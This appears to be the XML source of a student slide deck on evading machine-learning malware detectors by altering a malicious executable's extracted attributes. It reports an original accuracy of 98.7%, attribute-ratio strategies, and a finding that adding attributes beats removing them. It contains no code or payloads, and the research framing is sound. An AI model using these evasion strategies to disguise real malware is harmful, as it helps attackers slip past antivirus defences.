        <a:xfrm rot="5400000">
          <a:off x="2544611" y="2449823"/>
          <a:ext cx="363835" cy="436602"/>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5400000">
        <a:off x="2595548" y="2486206"/>
        <a:ext cx="261962" cy="254685"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{19325DD8-264F-B844-A054-F5F27CAF19E5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2910681"/>
          <a:ext cx="5453059" cy="970226"/>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Test</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            <a:t> with modified data</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="28417" y="2939098"/>
        <a:ext cx="5396225" cy="913392"/>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2.tiff>
</file>

<file path=ppt/media/image13.tiff>
</file>

<file path=ppt/media/image14.tiff>
</file>

<file path=ppt/media/image15.tiff>
</file>

<file path=ppt/media/image16.tiff>
</file>

<file path=ppt/media/image17.gif>
</file>

<file path=ppt/media/image18.png>
</file>

<file path=ppt/media/image19.png>
</file>

<file path=ppt/media/image2.png>
</file>

<file path=ppt/media/image20.png>
</file>

<file path=ppt/media/image21.tiff>
</file>

<file path=ppt/media/image22.tiff>
</file>

<file path=ppt/media/image23.tiff>
</file>

<file path=ppt/media/image24.tiff>
</file>

<file path=ppt/media/image25.tiff>
</file>

<file path=ppt/media/image3.png>
</file>

<file path=ppt/media/image4.png>
</file>

<file path=ppt/media/image5.png>
</file>

<file path=ppt/media/image6.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1DB55A-F66E-884C-A409-CC81ACA880E7}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/14/17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63729A-534C-874A-B073-5D3F38B81A78}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1812712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 bunch of anti-virus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> software, detecting malicious apps/binaries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>No interested in detecting , but</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>However, to learn how to evade detection, first, </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1C63729A-534C-874A-B073-5D3F38B81A78}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1505175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To do so, we can directly modify the extracted attributes rather than really implementing specific virus programs. This will also give us more global view of the topic.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1C63729A-534C-874A-B073-5D3F38B81A78}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="758887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Meanwhile, we will also compare the modifications we do to existing hiding schemes in security field. It can be done in two directions. Firstly, we blindly modify dataset and look for possible way to hide a malicious executable. Then we compare such way to existing schemes. Secondly, we try extracting from existing schemes possible ways to modify the dataset and verify if that can work for certain classifier models.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1C63729A-534C-874A-B073-5D3F38B81A78}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11119279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many</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>dataset we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> can find.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1C63729A-534C-874A-B073-5D3F38B81A78}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18876583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C63729A-534C-874A-B073-5D3F38B81A78}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1433925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matter which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>attr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> we change,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> does not work at all</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1C63729A-534C-874A-B073-5D3F38B81A78}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1545032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C63729A-534C-874A-B073-5D3F38B81A78}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1846938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C63729A-534C-874A-B073-5D3F38B81A78}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1186452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1C63729A-534C-874A-B073-5D3F38B81A78}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2004888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key idea of the project is to use machine learning as a tool to help us better understand how a virus can hide itself from the detection of antivirus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>softwares</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>. Hiding malicious traces is a long-existing topic and new techniques keep emerging. However, there has never been a systematic way for the job. Thus we want to test from the database how a malicious can be disguised so</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> that it is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> undetected by certain classifier models.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Best</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> modification: with least </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>modified attributes; adding better than removing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="0"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C63729A-534C-874A-B073-5D3F38B81A78}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8487012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dataset is about malicious executables (virus). Common features are extracted from real-world malicious and non-malicious executables. The dataset is very new (published in March 2016) but the weakness is that the sample number is relatively low compared to other datasets. However, the goal of our project is not to exhaustively find the best machine learning model to classify malicious and non-malicious executables. Thus we think the low sample amount is tolerable.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1C63729A-534C-874A-B073-5D3F38B81A78}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="619500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4/14/17</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14.tiff"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.tiff"/><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upx.github.io/" TargetMode="Externa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earchsecurity.techtarget.com/feature/Antivirus-evasion-techniques-show-ease-in-avoiding-antivirus-detection" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.informit.com/articles/article.aspx?p=26150&amp;seqNum=5"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21.tiff"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.tiff"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.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8.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.tiff"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.tiff"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.tiff"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.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32.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors3.xml"/><Relationship Id="rId12"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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramData" Target="../diagrams/data3.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="../diagrams/layout3.xml"/><Relationship Id="rId10"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84218" y="1516157"/>
            <a:ext cx="9996426" cy="2262781"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0" smtClean="0"/>
              <a:t>Evading the Machine Learning Detector: A Virus’ Perspective</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2589212" y="4675779"/>
            <a:ext cx="9196387" cy="1187992"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Group 10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Yuan Xiao, Xiaokuan Zhang</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19577477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114540247"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2592925" y="1576386"/>
          <a:ext cx="8128000" cy="46762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itle 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1537855" y="624110"/>
            <a:ext cx="10515600"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mtClean="0"/>
              <a:t>Naïve Modification : Adding Single Attribute</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1635504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EE2884FA-A435-2D49-A6B1-80094D6D6B32}"/>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dgm id="{13FFA6E3-5D85-CE4C-ADDE-892A67D25C7D}"/>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graphicEl>
                                              <a:dgm id="{5CA6EC47-EE69-F547-85C0-02B78FD52AA5}"/>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graphicEl>
                                              <a:dgm id="{FC1235AF-C98B-D240-A9AD-95CEDBC64CE4}"/>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graphicEl>
                                              <a:dgm id="{39E344F8-802C-3947-A8CE-497365DBA8FF}"/>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graphicEl>
                                              <a:dgm id="{11949F16-C144-FD44-8E60-D324573245AE}"/>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graphicEl>
                                              <a:dgm id="{2C5EF84B-B1C8-EA47-9111-17C0758C5E1A}"/>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7855" y="624110"/>
            <a:ext cx="10515600" cy="1280890"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Naïve </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Modification : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Adding Single Attribute</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4"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93711" y="1316278"/>
            <a:ext cx="7348208" cy="5499202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8049193" y="3281049"/>
            <a:ext cx="2928142" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Better solution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="638787" y="1316278"/>
            <a:ext cx="3603475" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Original Accuracy:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		98.7%</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8049193" y="3804269"/>
            <a:ext cx="1719609" cy="2185017"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Elbow Connector 4"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="3205725" y="1505184"/>
            <a:ext cx="271337" cy="1801737"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="31750">
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent2"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent2"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Multiply 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6198118" y="1905000"/>
            <a:ext cx="1542173" cy="1416214"/>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6340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par>
                                <p:cTn id="13" presetID="2" presetClass="entr" presetSubtype="4"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Instance modification strategy (1)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="986117" y="2161309"/>
            <a:ext cx="11044518" cy="4382926"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>For every attribute X(1~530) in the training set, compute:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> Positive   Ratio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>PR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>) = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(benign instances that have attribute X) 								 	  /(total benign instances)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Negative Ratio(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>NR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>instances </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>that have attribute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>X) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>								</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>  /(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>total malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>instances)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
